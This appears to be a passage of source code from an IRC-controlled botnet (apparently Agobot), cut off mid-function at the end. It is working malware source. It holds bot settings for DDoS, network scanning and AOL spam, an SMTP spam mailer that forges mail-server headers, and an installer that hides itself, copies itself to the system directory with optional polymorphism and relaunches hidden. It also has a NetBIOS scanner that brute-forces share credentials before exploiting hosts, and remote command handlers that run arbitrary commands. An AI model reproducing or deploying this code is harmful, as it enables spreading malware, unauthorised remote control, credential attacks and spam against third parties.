g_cMainCtrl.m_cCVar.RegisterCvar(&m_isServer0.si_servpass, "si_server_0.servpass", \ "", "Server Info - Server Password", false, false, 0 ); g_cMainCtrl.m_cCVar.RegisterCvar(&m_isServer0.si_usessl, "si_server_0.use_ssl", \ "false", "Server Info - Use SSL ?", false, false, 0 ); g_cMainCtrl.m_cIRC.m_vServers.push_back(&m_isServer0); g_cMainCtrl.m_cCVar.RegisterCvar(&si_chanpass, "si_chanpass", "", "Server Info - Channel Password", false, false, 0 ); g_cMainCtrl.m_cCVar.RegisterCvar(&si_mainchan, "si_mainchan", "", "Server Info - Main Channel", false, false, 0 ); g_cMainCtrl.m_cCVar.RegisterCvar(&si_nickprefix, "si_nickprefix", "", "Server Info - Nickname prefix", false, false, 0 ); g_cMainCtrl.m_cCVar.RegisterCvar(&si_port, "si_port", "", "Server Info - Server Port", false, false, 0 ); g_cMainCtrl.m_cCVar.RegisterCvar(&si_server, "si_server", "", "Server Info - Server Address", false, false, 0 ); g_cMainCtrl.m_cCVar.RegisterCvar(&si_servpass, "si_servpass", "", "Server Info - Server Password", false, false, 0 ); g_cMainCtrl.m_cCVar.RegisterCvar(&si_usessl, "si_usessl", "", "Server Info - Use SSL ?", false, false, 0 ); g_cMainCtrl.m_cCVar.RegisterCvar(&si_nick, "si_nick", "", "Server Info - Nickname", false, false, 0 ); g_cMainCtrl.m_cCVar.RegisterCvar(&bot_version, "bot_version", VERSION_AGOBOT, "Bot - Version", false, false, 0 ); g_cMainCtrl.m_cCVar.RegisterCvar(&bot_filename, "bot_filename", "filename.exe", "Bot - Runtime Filename", false, false, 0 ); g_cMainCtrl.m_cCVar.RegisterCvar(&bot_id, "bot_id", "a3-100", "Bot - Current ID", false, false, 0 ); g_cMainCtrl.m_cCVar.RegisterCvar(&bot_prefix, "bot_prefix", ".", "Bot - Command Prefix", false, false, 0 ); g_cMainCtrl.m_cCVar.RegisterCvar(&bot_ftrans_port, "bot_ftrans_port", sTemp.CStr(), "Bot - File Transfer Port", false, false, 0 ); g_cMainCtrl.m_cCVar.RegisterCvar(&bot_timeout, "bot_timeout", "720000", "Bot - Timeout for receiving in miliseconds", false, false, 0 ); g_cMainCtrl.m_cCVar.RegisterCvar(&bot_seclogin, "bot_seclogin", "false", "Bot - Enable login only by channel messages", false, false, 0 ); g_cMainCtrl.m_cCVar.RegisterCvar(&bot_compnick, "bot_compnick", "false", "Bot - Use the computer name as a nickname", false, false, 0 ); g_cMainCtrl.m_cCVar.RegisterCvar(&as_valname, "as_valname", "Configuration Loader", "Autostart - Value Name", false, false, 0 ); g_cMainCtrl.m_cCVar.RegisterCvar(&as_enabled, "as_enabled", "true", "Autostart - Enabled", false, false, 0 ); g_cMainCtrl.m_cCVar.RegisterCvar(&scan_maxthreads, "scan_maxthreads", "100", "Scanner - Maximum Number of threads", false, false, 0 ); g_cMainCtrl.m_cCVar.RegisterCvar(&scan_auto, "scan_auto", "true", "Scanner - Autoscan local network", false, false, 0 ); g_cMainCtrl.m_cCVar.RegisterCvar(&scan_auto, "scan_auto_nb", "true", "Scanner - Autoscan LAN for NetBIOS", false, false, 0 ); g_cMainCtrl.m_cCVar.RegisterCvar(&ddos_maxthreads, "ddos_maxthreads", "100", "DDOS - Maximum Number of threads", false, false, 0 ); g_cMainCtrl.m_cCVar.RegisterCvar(&redir_maxthreads, "redir_maxthreads", "100", "Redirect - Maximum Number of threads", false, false, 0 ); g_cMainCtrl.m_cCVar.RegisterCvar(&identd_enabled, "identd_enabled", "false", "IdentD - Enable the server", false, false, 0 ); g_cMainCtrl.m_cCVar.RegisterCvar(&spam_aol_channel, "spam_aol_channel", "#aolspam", "AOL Spam - Channel name", false, false, 0 ); g_cMainCtrl.m_cCVar.RegisterCvar(&spam_aol_enabled, "spam_aol_enabled", "true", "AOL Spam - Channel name", false, false, 0 ); g_cMainCtrl.m_cCVar.SetCVar(&g_cMainCtrl.m_cBot.si_chanpass, g_cMainCtrl.m_cIRC.m_vServers.at(0)->si_chanpass.sValue.CStr()); g_cMainCtrl.m_cCVar.SetCVar(&g_cMainCtrl.m_cBot.si_mainchan, g_cMainCtrl.m_cIRC.m_vServers.at(0)->si_mainchan.sValue.CStr()); g_cMainCtrl.m_cCVar.SetCVar(&g_cMainCtrl.m_cBot.si_nickprefix, g_cMainCtrl.m_cIRC.m_vServers.at(0)->si_nickprefix.sValue.CStr()); g_cMainCtrl.m_cCVar.SetCVar(&g_cMainCtrl.m_cBot.si_port, g_cMainCtrl.m_cIRC.m_vServers.at(0)->si_port.sValue.CStr()); g_cMainCtrl.m_cCVar.SetCVar(&g_cMainCtrl.m_cBot.si_server, g_cMainCtrl.m_cIRC.m_vServers.at(0)->si_server.sValue.CStr()); g_cMainCtrl.m_cCVar.SetCVar(&g_cMainCtrl.m_cBot.si_servpass, g_cMainCtrl.m_cIRC.m_vServers.at(0)->si_servpass.sValue.CStr()); g_cMainCtrl.m_cCVar.SetCVar(&g_cMainCtrl.m_cBot.si_usessl, g_cMainCtrl.m_cIRC.m_vServers.at(0)->si_usessl.sValue.CStr()); // Use MD5 Passwords, for security reasons g_cMainCtrl.m_cMac.AddUser("User", "MYMD5HASHWILLBEBIGBADANDLONGHEHE", "Netmask.Net", "" ); // "password" }
bool CSMTP_Connection::Mail(CString sMailFrom, CString sMailFromFull, CString sRcptTo, CString sSubject, CString sData) { CString sReqBuf, sRecvBuf, sHost, sSrcID, sMTA, sOS; init_random(); m_iMTAType=brandom(MTA_TYPE_UNKNOWN, MTA_TYPE_QMAIL); switch(brandom(1,5)) { case 1: sOS.Assign("Debian"); break; case 2: sOS.Assign("RedHat"); break; case 3: sOS.Assign("SuSE"); break; case 4: sOS.Assign("Slackware"); break; case 5: sOS.Assign("FreeBSD"); break; default: sOS.Assign("Unknown"); break; } switch(m_iMTAType) { case MTA_TYPE_UNKNOWN: { CString sVersionHigh, sVersionLow, sNumber; sVersionHigh.Assign(brandom(3, 4)); sVersionLow.Assign(brandom(1, 40)); sMTA.Format("SMTP %s.%s (%s)", sVersionHigh.CStr(), sVersionLow.CStr(), sOS.CStr()); } break; case MTA_TYPE_EXIM: { CString sVersionHigh, sVersionLow, sNumber; sVersionHigh.Assign(brandom(3, 4)); sVersionLow.Assign(brandom(1, 40)); sNumber.Assign(brandom(1, 5)); sMTA.Format("Exim %s.%s #%s (%s)", sVersionHigh.CStr(), sVersionLow.CStr(), sNumber.CStr(), sOS.CStr()); } break; case MTA_TYPE_SENDMAIL: { CString sVersionHigh, sVersionLow, sVersionLow2; sVersionHigh.Assign(brandom(1, 12)); sVersionLow.Assign(brandom(1, 10)); sVersionLow2.Assign(brandom(1, 10)); sMTA.Format("8.%s.%s/8.%s.%s", sVersionHigh.CStr(), sVersionLow.CStr(), sVersionHigh.CStr(), sVersionLow2.CStr()); } break; case MTA_TYPE_QMAIL: { CString sPid; sPid.Assign(brandom(1, 65000)); CString sInvokedBy; int iInvokedBy=brandom(1,3); if(iInvokedBy==1) { sInvokedBy.Assign("alias"); } else if(iInvokedBy==2) { sInvokedBy.Assign("network"); } else if(iInvokedBy==3) { sInvokedBy.Assign("uid 0"); } sMTA.Format("qmail %s invoked by %s", sPid.CStr(), sInvokedBy.CStr()); } break; case MTA_TYPE_GAIA: break; case MTA_TYPE_MSSMTPSVC: break; case MTA_TYPE_MSEXCHANGE: break; case MTA_TYPE_HOTMAILWM: break; case MTA_TYPE_WEBMAIL: break; case MTA_TYPE_POSTFIX: break; case MTA_TYPE_SMTPD: break; case MTA_TYPE_LIST_AMIRC: break; default: #ifdef DBGCONSOLE g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): " "Invalid MTA type selected!\n", this); #endif // DBGCONSOLE Disconnect(); return false; break; } // Generate an ID CString sID=GenerateID(); sSrcID.Assign(sID); // Get local hostname sHost.Assign(g_pMainCtrl->m_cIRC.m_sLocalHost.CStr()); // Send MAIL FROM command sReqBuf.Format("MAIL FROM:<%s>\r\n", sMailFrom.CStr()); m_sServerSocket.Write(sReqBuf.CStr(), sReqBuf.GetLength()); // Receive reply m_sServerSocket.Recv(sRecvBuf.GetBuffer(8192), 8192); if(sRecvBuf.Mid(0, 3).Compare("250")) { // MAIL FROM failed #ifdef DBGCONSOLE g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): " "Server rejected MAIL FROM \"%s\" (\"%s\")!\n", this, sMailFrom.CStr(), sRecvBuf.Token(0, "\r").CStr()); #endif // DBGCONSOLE Disconnect(); return false; } // Send RCPT TO command sReqBuf.Format("RCPT TO:<%s>\r\n", sRcptTo.CStr()); m_sServerSocket.Write(sReqBuf.CStr(), sReqBuf.GetLength()); // Receive reply m_sServerSocket.Recv(sRecvBuf.GetBuffer(8192), 8192); if(sRecvBuf.Mid(0, 3).Compare("250")) { // RCPT TO failed #ifdef DBGCONSOLE g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): " "Server rejected RCTP TO \"%s\" (\"%s\")!\n", this, sRcptTo.CStr(), sRecvBuf.Token(0, "\r").CStr()); #endif // DBGCONSOLE Disconnect(); return false; } // Send DATA command sReqBuf.Format("DATA\r\n"); m_sServerSocket.Write(sReqBuf.CStr(), sReqBuf.GetLength()); // Receive reply m_sServerSocket.Recv(sRecvBuf.GetBuffer(8192), 8192); if(sRecvBuf.Mid(0, 3).Compare("354")) { // DATA failed #ifdef DBGCONSOLE g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): " "Server rejected DATA (\"%s\")!\n", this, sRecvBuf.Token(0, "\r").CStr()); #endif // DBGCONSOLE Disconnect(); return false; } // Get local time time_t tGlobal=time(NULL); char szTimeBuf[4096]; strftime(szTimeBuf, sizeof(szTimeBuf), "%a, %d %b %Y %H:%M:%S GMT", gmtime(&tGlobal)); // Clear buffer sReqBuf.Assign(""); switch(m_iMTAType) { case MTA_TYPE_UNKNOWN: sReqBuf.Append("Received: from "); sReqBuf.Append(sMailFrom.Token(0, "@").CStr()); sReqBuf.Append(" by "); sReqBuf.Append(sHost.CStr()); sReqBuf.Append(" with local\r\n"); if(m_bUseSMTPExt) { // id 1AOkjD-0001RE-00 sReqBuf.Append("\tid "); sReqBuf.Append(sSrcID.Mid(1)); sReqBuf.Append("\r\n"); // for <*****@*****.**>; Tue, 25 Nov 2003 22:28:12 +0100 sReqBuf.Append("\tfor <"); sReqBuf.Append(sRcptTo.CStr()); sReqBuf.Append(">; "); sReqBuf.Append(szTimeBuf); sReqBuf.Append("\r\n"); // Message-Id: <*****@*****.**> sReqBuf.Append("Message-Id: <"); sReqBuf.Append(sSrcID.CStr()); sReqBuf.Append("@"); sReqBuf.Append(sRcptTo.CStr()); sReqBuf.Append(">\r\n"); } break; case MTA_TYPE_EXIM: // Received: from xxxx by xxxxx.xxxxxxx.xxx with local (Exim 3.36 #1 (Debian)) sReqBuf.Append("Received: from "); sReqBuf.Append(sMailFrom.Token(0, "@").CStr()); sReqBuf.Append(" by "); sReqBuf.Append(sHost.CStr()); sReqBuf.Append(" with local ("); sReqBuf.Append(sMTA.CStr()); sReqBuf.Append(")\r\n"); if(m_bUseSMTPExt) { // id 1AOkjD-0001RE-00 sReqBuf.Append("\tid "); sReqBuf.Append(sSrcID.Mid(1)); sReqBuf.Append("\r\n"); // for <*****@*****.**>; Tue, 25 Nov 2003 22:28:12 +0100 sReqBuf.Append("\tfor <"); sReqBuf.Append(sRcptTo.CStr()); sReqBuf.Append(">; "); sReqBuf.Append(szTimeBuf); sReqBuf.Append("\r\n"); // Message-Id: <*****@*****.**> sReqBuf.Append("Message-Id: <"); sReqBuf.Append(sSrcID.CStr()); sReqBuf.Append("@"); sReqBuf.Append(sRcptTo.CStr()); sReqBuf.Append(">\r\n"); } break; case MTA_TYPE_SENDMAIL: // Received: from xxxx by xxxx.xxxxxxx.xxx (8.12.8p1/8.12.6) with local sReqBuf.Append("Received: from "); sReqBuf.Append(sMailFrom.Token(0, "@").CStr()); sReqBuf.Append(" by "); sReqBuf.Append(sHost.CStr()); sReqBuf.Append("(8."); sReqBuf.Append(sMTA.CStr()); sReqBuf.Append(") with local\r\n"); if(m_bUseSMTPExt) { // id 1AOkjD-0001RE-00 sReqBuf.Append("\tid "); sReqBuf.Append(sSrcID.Mid(1)); sReqBuf.Append("\r\n"); // for <*****@*****.**>; Tue, 25 Nov 2003 22:28:12 +0100 sReqBuf.Append("\tfor <"); sReqBuf.Append(sRcptTo.CStr()); sReqBuf.Append(">; "); sReqBuf.Append(szTimeBuf); sReqBuf.Append("\r\n"); // Message-Id: <*****@*****.**> sReqBuf.Append("Message-Id: <"); sReqBuf.Append(sSrcID.CStr()); sReqBuf.Append("@"); sReqBuf.Append(sRcptTo.CStr()); sReqBuf.Append(">\r\n"); } break; case MTA_TYPE_QMAIL: // Received: (qmail 21608 invoked by alias); 17 Jul 2002 14:30:10 -0000 sReqBuf.Append("Received: ("); sReqBuf.Append(sMTA.CStr()); sReqBuf.Append("); "); sReqBuf.Append(szTimeBuf); sReqBuf.Append("\r\n"); break; case MTA_TYPE_GAIA: break; case MTA_TYPE_MSSMTPSVC: break; case MTA_TYPE_MSEXCHANGE: break; case MTA_TYPE_HOTMAILWM: break; case MTA_TYPE_WEBMAIL: break; case MTA_TYPE_POSTFIX: break; case MTA_TYPE_SMTPD: break; case MTA_TYPE_LIST_AMIRC: break; } // From: xxxx <*****@*****.**> sReqBuf.Append("From: "); sReqBuf.Append(sMailFromFull.CStr()); sReqBuf.Append(" <"); sReqBuf.Append(sMailFrom.CStr()); sReqBuf.Append(">\r\n"); // To: [email protected] sReqBuf.Append("To: "); sReqBuf.Append(sRcptTo.CStr()); sReqBuf.Append("\r\n"); // Subject: bla sReqBuf.Append("Subject: "); sReqBuf.Append(sSubject.CStr()); sReqBuf.Append("\r\n"); // Date: Tue, 25 Nov 2003 22:28:12 +0100 sReqBuf.Append("Date: "); sReqBuf.Append(szTimeBuf); sReqBuf.Append("\r\n"); // MIME-Version: 1.0 sReqBuf.Append("MIME-Version: 1.0\r\n"); // if(g_cSMTPLogic.spam_htmlemail.bValue) { // Content-Type: text/html; charset=us-ascii sReqBuf.Append("Content-Type: text/html; charset=us-ascii\r\n"); // } else { // // Content-Type: text/plain; charset=us-ascii // sReqBuf.Append("Content-Type: text/plain; charset=us-ascii\r\n"); // } sReqBuf.Append("Content-Type: text/html; charset=us-ascii\r\n"); // Content-Transfer-Encoding: 7bit sReqBuf.Append("Content-Transfer-Encoding: 7bit\r\n"); // // <data> // . // if(g_cSMTPLogic.spam_htmlemail.bValue) { sReqBuf.Append("\r\n\r\n"); // } else { // sReqBuf.Append("\r\n"); // } sReqBuf.Append("\r\n\r\n"); sReqBuf.Append(sData.CStr()); sReqBuf.Append("\r\n.\r\n"); // Send data m_sServerSocket.Write(sReqBuf.CStr(), sReqBuf.GetLength()); // Receive reply if(!m_sServerSocket.Recv(sRecvBuf.GetBuffer(8192), 8192)) { // Connection reset #ifdef DBGCONSOLE g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): " "Connection reset!\n", this); #endif // DBGCONSOLE Disconnect(); return false; } // Check if data was accepted if(sRecvBuf.Mid(0, 3).Compare("250")) { // Data not accepted #ifdef DBGCONSOLE g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): " "Server rejected MAIL FROM \"%s\", RCPT TO \"%s\"!\n", this, sMailFrom.CStr(), sRcptTo.CStr()); #endif // DBGCONSOLE Disconnect(); return false; } return true; }
bool CSMTP_Connection::Hello() { CString sReqBuf; CString sRecvBuf; CString sHost; // Get local hostname sHost.Assign(g_pMainCtrl->m_cIRC.m_sLocalHost.CStr()); // Send EHLO command sReqBuf.Format("EHLO %s\r\n", sHost.CStr()); m_sServerSocket.Write(sReqBuf.CStr(), sReqBuf.GetLength()); // Receive reply if(!m_sServerSocket.Recv(sRecvBuf.GetBuffer(8192), 8192)) { // Connection reset #ifdef DBGCONSOLE g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): " "Connection reset!\n", this); #endif // DBGCONSOLE Disconnect(); return false; } // Check if EHLO was accepted if(sRecvBuf.Mid(0, 3).Compare("250")) { // EHLO not accepted, try HELO (no ESMTP) #ifdef DBGCONSOLE g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): " "Server rejected EHLO, disabling SMTP extensions!\n", this); #endif // DBGCONSOLE // Send HELO command sReqBuf.Format("HELO %s\r\n", sHost.CStr()); m_sServerSocket.Write(sReqBuf.CStr(), sReqBuf.GetLength()); // Receive reply if(!m_sServerSocket.Recv(sRecvBuf.GetBuffer(8192), 8192)) { // Connection reset #ifdef DBGCONSOLE g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): " "Connection reset!\n", this); #endif // DBGCONSOLE Disconnect(); return false; } // Check if HELO was accepted if(sRecvBuf.Mid(0, 3).Compare("250")) { // HELO not accepted #ifdef DBGCONSOLE g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): " "Server rejected HELO!\n", this); #endif // DBGCONSOLE Disconnect(); return false; } // HELO accepted, disable ESMTP and return true m_bUseSMTPExt=false; return true; } #ifdef DBGCONSOLE g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): " "Enabled SMTP extensions!\n", this); #endif // DBGCONSOLE // EHLO accepted, enable ESMTP and return true m_bUseSMTPExt=true; return true; }
bool CInstaller::CopyToSysDir(CString &sFilename) { char tstr[MAX_PATH]; #ifdef WIN32 CString sysdir; GetSystemDirectory(sysdir.GetBuffer(MAX_PATH), MAX_PATH); m_sSysDir.Assign(sysdir.CStr()); CString cfilename; GetModuleFileName(GetModuleHandle(NULL), cfilename.GetBuffer(MAX_PATH), MAX_PATH); HINSTANCE kernel32_dll=LoadLibrary("kernel32.dll"); if(kernel32_dll) { fRegisterServiceProcess=(RSP)GetProcAddress(kernel32_dll, "RegisterServiceProcess"); fCreateToolhelp32Snapshot=(CT32S)GetProcAddress(kernel32_dll, "CreateToolhelp32Snapshot"); fProcess32First=(P32F)GetProcAddress(kernel32_dll, "Process32First"); fProcess32Next=(P32N)GetProcAddress(kernel32_dll, "Process32Next"); if(fRegisterServiceProcess) fRegisterServiceProcess(0, 1); } #else if(getuid()) { // We aren't root, use /tmp m_sSysDir.Assign("/tmp"); } else { // We are root, use /usr/sbin m_sSysDir.Assign("/usr/sbin"); } CString sysdir(m_sSysDir); CString cfilename(g_pMainCtrl->m_sArgv0); #endif // WIN32 #ifdef DBGCONSOLE g_cConsDbg.Log(5, "Checking for multiple copies...\n"); #endif // DBGCONSOLE if(!g_pMainCtrl->m_cCmdLine.m_cConfig.bUpdate && !g_pMainCtrl->m_cCmdLine.m_cConfig.bService) { unsigned long lStartTime=GetTickCount(); bool bFound=true; while((GetTickCount()-lStartTime) < 60000 && bFound) { if(GetCopies(sFilename)<2) bFound=false; Sleep(1000); } if(bFound) { #ifdef DBGCONSOLE g_cConsDbg.Log(5, "Found 2 copies, exiting...\n"); #endif // DBGCONSOLE exit(1); } } #ifdef DBGCONSOLE g_cConsDbg.Log(5, "First copy running...\n"); #endif // DBGCONSOLE long lTimeoutStart; if(!cfilename.Find(sFilename.CStr(), 0)) if(g_pMainCtrl->m_cCmdLine.m_cConfig.bUpdate) KillProcess(sFilename.CStr()); if(!cfilename.Find(sysdir, 0) || cfilename.Find("winhlpp32.exe", 0)) #ifdef LINUX if(!cfilename.Find(sFilename, 0)) #endif // LINUX { sprintf(tstr, "%s%c%s", sysdir.CStr(), DIRCHAR, sFilename.CStr()); lTimeoutStart=GetTickCount(); #ifdef DBGCONSOLE g_cConsDbg.Log(5, "Trying to copy to system directory...\n"); #endif // DBGCONSOLE // FIXME::BAD!!! #ifdef WIN32 if(g_pMainCtrl->m_pBot->inst_polymorph.bValue) { // Polymorph here CPolymorph cPoly; if(!cPoly.DoPolymorph(cfilename, tstr)) { // Fall back to copying if this didnt work while(CopyFile(cfilename, tstr, false)==false && GetTickCount()-lTimeoutStart < 25000) Sleep(2000); } else { while(CopyFile(cfilename, tstr, false)==false && GetTickCount()-lTimeoutStart < 25000) Sleep(2000); } } else { // Without Polymorph while(CopyFile(cfilename, tstr, false)==false && GetTickCount()-lTimeoutStart < 25000) Sleep(2000); } #else char szCmdBuf[MAX_PATH]; sprintf(szCmdBuf, "cp %s %s", cfilename.CStr(), tstr); system(szCmdBuf); #endif // WIN32 #ifdef DBGCONSOLE g_cConsDbg.Log(5, "Finished copying to system directory...\n"); #endif // DBGCONSOLE #ifndef _DEBUG #ifdef DBGCONSOLE g_cConsDbg.Log(5, "Starting new process...\n"); #endif // DBGCONSOLE if(g_pMainCtrl->m_pBot->bot_meltserver.bValue) { strncat(tstr, " -meltserver \"", sizeof(tstr)); strncat(tstr, cfilename.CStr(), sizeof(tstr)); strncat(tstr, "\"", sizeof(tstr)); } #ifdef WIN32 PROCESS_INFORMATION pinfo; STARTUPINFO sinfo; memset(&sinfo, 0, sizeof(STARTUPINFO)); sinfo.cb = sizeof(sinfo); sinfo.wShowWindow = SW_HIDE; if(CreateProcess(NULL, tstr, NULL, NULL, FALSE, NORMAL_PRIORITY_CLASS | DETACHED_PROCESS, NULL, NULL, &sinfo, &pinfo)) { exit(0); } #else sprintf(szCmdBuf, "%s 2>&1 > /dev/null 2>&1 &", tstr); system(szCmdBuf); exit(0); #endif // WIN32 #endif // _DEBUG } return true; }
void CScannerNetBios::StartScan(const CString &sHost) { if(ScanPort(sHost.CStr(), 445) || ScanPort(sHost.CStr(), 139)) { g_cMainCtrl.m_cIRC.SendFormat(m_bSilent, m_bNotice, m_sReplyTo.Str(), "%s: scanning ip %s.", m_sScannerName.CStr(), sHost.CStr()); MultiByteToWideChar(CP_ACP, 0, sHost.CStr(), sHost.GetLength()+1, m_wszHost, (int)sizeof(m_wszHost)/(int)sizeof(m_wszHost[0])); wcscpy(m_wszServer, L"\\\\"); wcscat(m_wszServer, m_wszHost); wcscpy(m_wszResource, m_wszServer); wcscat(m_wszResource, L"\\IPC$"); int iNameCount=0, iShareCount=0; m_lUsers.clear(); m_lShares.clear(); CloseSession(); if(NullSession()) { GetUsers(&m_lUsers); GetShares(&m_lShares); CloseSession(); } while(names[iNameCount]) { userinfo *pUser=new userinfo; pUser->sName.Assign(names[iNameCount]); pUser->sServer.Assign(sHost); m_lUsers.push_back(pUser); iNameCount++; } while(shares[iShareCount]) { shareinfo *pShare=new shareinfo; pShare->sName.Assign(shares[iShareCount]); pShare->sRemark.Assign("default"); m_lShares.push_back(pShare); iShareCount++; } bool bExploited=false; list<shareinfo*>::iterator iShares; iShares=m_lShares.begin(); list<userinfo*>::iterator iUsers; iUsers=m_lUsers.begin(); while(iShares!=m_lShares.end() && !bExploited && m_pScanner->m_bScanning) { while(iUsers!=m_lUsers.end() && !bExploited && m_pScanner->m_bScanning) { WCHAR wszShare[MAX_PATH]; wcscpy(m_wszServer, L"\\\\"); wcscat(m_wszServer, m_wszHost); wcscpy(m_wszResource, m_wszServer); wcscat(m_wszResource, L"\\"); MultiByteToWideChar(CP_ACP, 0, (*iShares)->sName, (*iShares)->sName.GetLength()+1, wszShare, (int)sizeof(wszShare)/(int)sizeof(wszShare[0])); wcscat(m_wszResource, wszShare); if(AuthSession((*iUsers)->sName.CStr(), "") && !bExploited) { bExploited=Exploit((*iShares)->sName.CStr(), sHost.CStr(), (*iUsers)->sName.CStr(), ""); CloseSession(); } if(AuthSession((*iUsers)->sName.CStr(), (*iUsers)->sName.CStr()) && !bExploited) { bExploited=Exploit((*iShares)->sName.CStr(), sHost.CStr(), (*iUsers)->sName.CStr(), (*iUsers)->sName.CStr()); CloseSession(); } int pwd_count=0; while(pwds[pwd_count] && !bExploited) { if(AuthSession((*iUsers)->sName.CStr(), pwds[pwd_count]) && !bExploited) { bExploited=Exploit((*iShares)->sName.CStr(), sHost.CStr(), (*iUsers)->sName.CStr(), pwds[pwd_count]); CloseSession(); } pwd_count++; } iUsers++; } iShares++; iUsers=m_lUsers.begin(); } for(iUsers=m_lUsers.begin(); iUsers!=m_lUsers.end(); ++iUsers) delete (*iUsers); for(iShares=m_lShares.begin(); iShares!=m_lShares.end(); ++iShares) delete (*iShares); m_lUsers.clear(); m_lShares.clear(); } }
bool CBot::HandleCommand(CMessage *pMsg) { // ID if(!pMsg->sCmd.Compare(m_cmdId.sName.CStr())) { return g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, bot_id.sValue.Str(), pMsg->sReplyTo.Str()); } // Execute else if(!pMsg->sCmd.Compare(m_cmdExecute.sName.CStr())) { CString sText(pMsg->sChatString.Token(2, " ", true)); bool bVisible=atoi(pMsg->sChatString.Token(1, " ").CStr())==1; #ifdef WIN32 CString sTextExp; ExpandEnvironmentStrings(sText.CStr(), sTextExp.GetBuffer(8192), 8192); // interpret environment variables sText.Assign(sTextExp); PROCESS_INFORMATION pinfo; STARTUPINFO sinfo; memset(&sinfo, 0, sizeof(STARTUPINFO)); sinfo.cb=sizeof(sinfo); if(bVisible) sinfo.wShowWindow=SW_SHOW; else sinfo.wShowWindow=SW_HIDE; if(!CreateProcess(NULL, sText.Str(), NULL, NULL, TRUE, NORMAL_PRIORITY_CLASS | DETACHED_PROCESS, NULL, NULL, &sinfo, &pinfo)) { g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, "exec.error", pMsg->sReplyTo.Str()); return false; } #endif return true; } // Remove Bot else if(!pMsg->sCmd.Compare(m_cmdRemove.sName.Str())) { CString sNick(pMsg->sChatString.Token(1, " ", true)); if (!sNick.Compare(g_cMainCtrl.m_sUserName.CStr())) { if(g_cMainCtrl.m_cBot.as_enabled.bValue) g_cMainCtrl.m_cInstaller.RegStartDel(g_cMainCtrl.m_cBot.as_valname.sValue); if(g_cMainCtrl.m_cBot.as_service.bValue) g_cMainCtrl.m_cInstaller.ServiceDel(g_cMainCtrl.m_cBot.as_service_name.sValue); g_cMainCtrl.m_cInstaller.Uninstall(); g_cMainCtrl.m_cIRC.m_bRunning=false; g_cMainCtrl.m_bRunning=false; } } // About else if(!pMsg->sCmd.Compare(m_cmdAbout.sName.CStr())) { return g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, g_cMainCtrl.m_sNameVerStr.Str(), pMsg->sReplyTo.Str()); } // Flush DNS else if(!pMsg->sCmd.Compare(m_cmdFlushDNS.sName.CStr())) { #ifdef WIN32 // ipconfig.exe /flushdns Execute(dp(9,16,3,15,14,6,9,7,78,5,24,5,0).CStr(), dp(80,6,12,21,19,8,4,14,19,0).CStr()); #endif return true; } // Open File else if(!pMsg->sCmd.Compare(m_cmdOpen.sName.CStr())) { CString sText; sText=pMsg->sChatString.Token(1, " ").CStr(); CString bRet; bRet=(char)ShellExecute( NULL, "open", sText.CStr(), NULL, NULL, SW_SHOWNORMAL ); // bRet=system(sText.CStr())>0; // if(bRet) return g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, "file opened.", pMsg->sReplyTo.Str()); //else return g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, bRet.Str(), pMsg->sReplyTo.Str()); } // Quit else if(!pMsg->sCmd.Compare(m_cmdQuit.sName.CStr())) { g_cMainCtrl.m_cIRC.m_bRunning=false; return true; } // DNS else if(!pMsg->sCmd.Compare(m_cmdDns.sName.CStr())) { CString sReply; hostent *pHostent=NULL; in_addr iaddr; if(!pMsg->sChatString.Token(1, " ").Compare("")) return false; unsigned long addr=inet_addr(pMsg->sChatString.Token(1, " ").CStr()); if(addr!=INADDR_NONE) { pHostent=gethostbyaddr((char*)&addr, sizeof(struct in_addr), AF_INET); if(pHostent) { sReply.Format("%s resolved %s", pMsg->sChatString.Token(1, " ").CStr(), pHostent->h_name); return g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, sReply.Str(), pMsg->sReplyTo.Str()); } } else { pHostent=gethostbyname(pMsg->sChatString.Token(1, " ").CStr()); if(pHostent) { iaddr=*((in_addr*)*pHostent->h_addr_list); sReply.Format("%s -> %s", pMsg->sChatString.Token(1, " ").CStr(), inet_ntoa(iaddr)); return g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, sReply.Str(), pMsg->sReplyTo.Str()); } } if(!pHostent) { sReply.Format("resolve.error %s.", pMsg->sChatString.Token(1, " ").CStr()); return g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, sReply.Str(), pMsg->sReplyTo.Str()); } } // Random Nickname else if(!pMsg->sCmd.Compare(m_cmdRndNick.sName.CStr())) { CString sRndNick=RndNick(si_nickprefix.sValue.CStr()); g_cMainCtrl.m_cIRC.SendRawFormat("%s %s\r\n", dp(40,35,29,37,0).CStr(), sRndNick.CStr()); g_cMainCtrl.m_sUserName.Format("%s", sRndNick.Mid(0, 32).CStr()); return true; } // Run Command else if(!pMsg->sCmd.Compare(m_cmdCommand.sName.CStr())) { #ifdef WIN32 if(!(pMsg->sChatString.GetLength() > (pMsg->sCmd.GetLength()+pMsg->sChatString.Token(1, " ").GetLength()+3))) return false; CString sText; sText.Assign(&pMsg->sChatString[pMsg->sCmd.GetLength()+2]); bool bRet=false; CString sReplyBuf; sReplyBuf.Format("Executed: %s.", sText.CStr()); if(system(sText.CStr())==-1) { g_cMainCtrl.m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, "exec.error", pMsg->sReplyTo.Str()); return false; } else { 